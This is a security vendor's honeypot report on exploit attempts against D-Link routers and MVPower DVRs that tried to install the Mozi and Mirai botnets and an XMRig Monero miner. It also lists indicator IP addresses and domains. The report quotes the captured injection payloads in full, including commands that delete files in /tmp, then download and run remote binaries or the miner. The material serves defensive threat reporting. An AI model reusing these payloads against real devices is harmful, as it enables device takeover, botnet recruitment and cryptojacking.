CERTHoneypots

Honeypots: Exploit attempts on vulnerable IoT devices (week 38)

This week, on TEHTRIS Deceptive Response Network, our Threat Research team monitored exploit attempts on vulnerable IoT devices such as D-Link routers and MVPower DVR, in attempts to enroll devices in botnets or to mine cryptocurrencies.

TEHTRIS observed malicious activities aiming at identifying and exploiting vulnerable D-Link routers.

Downloading Mozi botnet

These exploit attempts against vulnerable D-Link routers might be linked to a campaign uncovered by Palo Alto security researchers in August[1], which aimed at spreading MooBot, a variant of the Mirai malware botnet targeting vulnerable Linux devices. The compromised devices would then be part of a botnet army and be used to launch DDoS attacks.

The URL request is  /HNAP1/. The HTTP header contains the following entries:

['soapaction: http://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget http://101.0.32[.]235:58211/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`', 'content-type: text/xml; charset="utf-8"']
  • a “Soapaction” entry with a purenetworks URL (used to exploit the vulnerability)
  • a sequence of Unix (Linux) commands to launch the following actions :
    1.  cd /tmp : to move in the /tmp repertory (where all temporary files are located)
    2. rm -rf * : to delete all files located in the current folder (/tmp) to “clean” the environment and to make sure that the following steps run smoothly
    3. wget http://101.0.32[.]235:58211/Mozi.m : to download the file Mozi.m from the threat actor IP address on port 58211.
    4. chmod 777 /tmp/Mozi.m : to give execution rights to the file Mozi.m
    5. /tmp/Mozi.m : to execute the file Mozi.m (which is a botnet).

The following 34 IP addresses and ports were referred to in the wget command (IoC):

IP

PORT

COUNTRY

AS

102.33.43[.]180

41657

ZA

AS327782 METROFIBRE-NETWORX

103.177.184[.]238

35708

IN

AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED

103.183.33[.]151

44513

IN

AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED

111.61.154[.]108

52431

CN

AS24547 HEBEI MOBILE COMMUNICATION COMPANY LIMITED

112.248.121[.]159

41418

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

115.197.16[.]182

56929

CN

AS4134 CHINANET

115.208.130[.]40

56453

CN

AS4134 CHINANET

115.214.105[.]133

52092

CN

AS4134 CHINANET

115.52.21[.]98

36522

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

117.198.248[.]77

51366

IN

AS9829 NATIONAL INTERNET BACKBONE

117.217.146[.]136

57716

IN

AS9829 NATIONAL INTERNET BACKBONE

117.248.53[.]4

38607

IN

AS9829 NATIONAL INTERNET BACKBONE

117.63.41[.]64

51007

CN

AS4134 CHINANET

120.83.139[.]253

48258

CN

AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE

121.146.43[.]89

52936

KR

AS4766 KOREA TELECOM

123.10.134[.]251

34082

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

123.4.76[.]90

38002

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

124.91.229[.]171

42558

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

125.43.187[.]57

36302

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

163.125.14[.]69

44713

CN

AS17623 CHINA UNICOM SHENZEN NETWORK

182.119.203[.]8

33233

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

2.143.34[.]209

38389

ES

AS3352 TELEFONICA DE ESPANA S.A.U.

200.110.58[.]246

56319

BO

AS27839 COMTECO LTDA

202.164.131[.]68

47322

IN

AS17465 CABLE ISP IN INDIA

210.89.58[.]46

39424

IN

AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED

210.89.58[.]95

46472

IN

AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED

221.5.62[.]248

50039

CN

AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE

27.45.39[.]192

42667

CN

AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE

39.74.100[.]178

44354

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

42.228.194[.]25

45252

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

42.230.87[.]201

34163

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

58.46.196[.]9

36279

CN

AS4134 CHINANET

59.92.167[.]106

43448

IN

AS9829 NATIONAL INTERNET BACKBONE

Downloading a cryptominer

TEHTRIS also observed attempts to exploit D-Link routers vulnerabilities to download a cryptominer.

The HTTP header contains the following entries:

['accept-encoding: gzip, deflate', 'soapaction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp; rm -rf xmr*; pkill xmrig*; wget https[:]//github[.]com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0`"', 'accept: */*', 'connection: keep-alive']

The attacker tries to download the cryptominer XMRig from GitHub and to mine Monero cryptocurrency.

The following 4 IP addresses sent this request on TEHTRIS’ honeypots (IoC):

IPCountryAS
 34.159.120[.]11 DEAS396982 GOOGLE-CLOUD-PLATFORM
34.89.116[.]57GB
104.196.255[.]198 US
34.85.144[.]234 US

This type of headers (« soapaction: “http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && ») are used by a Metasploit module and can be customed with what is added afterwards. Therefore, it is a very well-known method and easily accessible to low-skilled hackers.

TEHTRIS recommends updating your D-Link routers to patch the vulnerabilities used in these kinds of attacks.

Mirai malware targeting vulnerable MVPower DVR

Moreover, TEHTRIS detected specific traces of the Mirai malware that turns Linux-running devices into remotely controlled bots. Indeed, http/HTTPS requests were associated to User Agents changed to “Hello, world”, which is typical of Mirai malware activities. This constitutes an initial step of the Mirai botnet before downloading malicious executables.

These malicious activities emanated from 465 different IP addresses during week 38.

The following request was observed:

/shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws

The attacker tries to exploit a Shell Command Execution vulnerability on MVPower digital video recorders which may allow remote attackers to execute commands on vulnerable systems.

Malicious servers called by the wget command (IoC):

IP / Domain NamePORTCountryADDITIONAL INFORMATION
103.159.64[.]218 – SGAS395092 SHOCK-1
149.56.32[.]172 CAAS 16276 OVH SAS
158.69.162[.]106CAAS 16276 OVH SAS
185.10.57[.]10  NLAS 51430 ALTUSHOST B.V.
185.216.71[.]192 NL

AS 211252 DELIS LLC

 

More than 170 IP addresses conducting exploit attempts on TEHTRIS honeypots referred to this server.

41.216.189[.]209 DE

AS 211138 PRIVATE-HOSTING DI CIPRIANO OSCAR

 

7 Chinese IP addresses conducting the attacks on TEHTRIS honeypots referred to this server.

45.124.84[.]209VNAS 135967 BACH KIM NETWORK SOLUTIONS JOIN STOCK COMPANY
79.110.62[.]227USAS 211252 DELIS LLC
81.161.229[.]46US

AS 211252 DELIS LLC

More than 70 IP addresses conducting exploit attempts on TEHTRIS honeypots referred to this server.

91.122.37[.]169RUAS 12389 ROSTELECOM
123.97.144[.]20460082 CNAS 4134 CHINANET
171.125.249[.]18050882 CNAS 4837 CHINA UNICOM CHINA169 BACKBONE
183.150.97[.]4648304 CNAS 4134 CHINANET
222.141.40[.]14842134 CNAS 4837 CHINA UNICOM CHINA169 BACKBONE
27.45.14[.]10937775 CNAS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE
41.86.19[.]8640901 LRAS 37203 LIBTELCO
42.238.249[.]13740463 CNAS 4837 CHINA UNICOM CHINA169 BACKBONE
46.10.229[.]16353653 BGAS 8866 VIVACOM
botnet.psscc[.]cn

Created on 2022-06-09

This domain name is associated with IP address 81.161.229[.]46 (AS 211252 DELIS LLC US), tagged as malicious on multiple public databases and referred to directly in some URL requests detected this week.

jx.qingdaosheng[.]com

Created on 2022-03-20

This domain name is associated with IP address 156.234.211[.]155 (AS131685 SUN NETWORK HONG KONG LIMITED HK) and is listed on public blacklists.

networkmapping[.]xyzThis domain name is associated with IP address 20.187.116[.]78 (AS8075 Microsoft Corporation HK) flagged as malicious on multiple public databases.
whitesecurity[.]xyz

Created on 2021-12-12

This domain name is associated with IP address 185.38.142[.]79 (AS47674 NET SOLUTIONS – CONSULTORIA EM TECNOLOGIAS DE INFORMACAO, PT) flagged as malicious on multiple public databases.

TEHTRIS recommends blacklisting incoming flow from the above-mentioned IP addresses and domain names, as well as constantly updating your devices to patch vulnerabilities.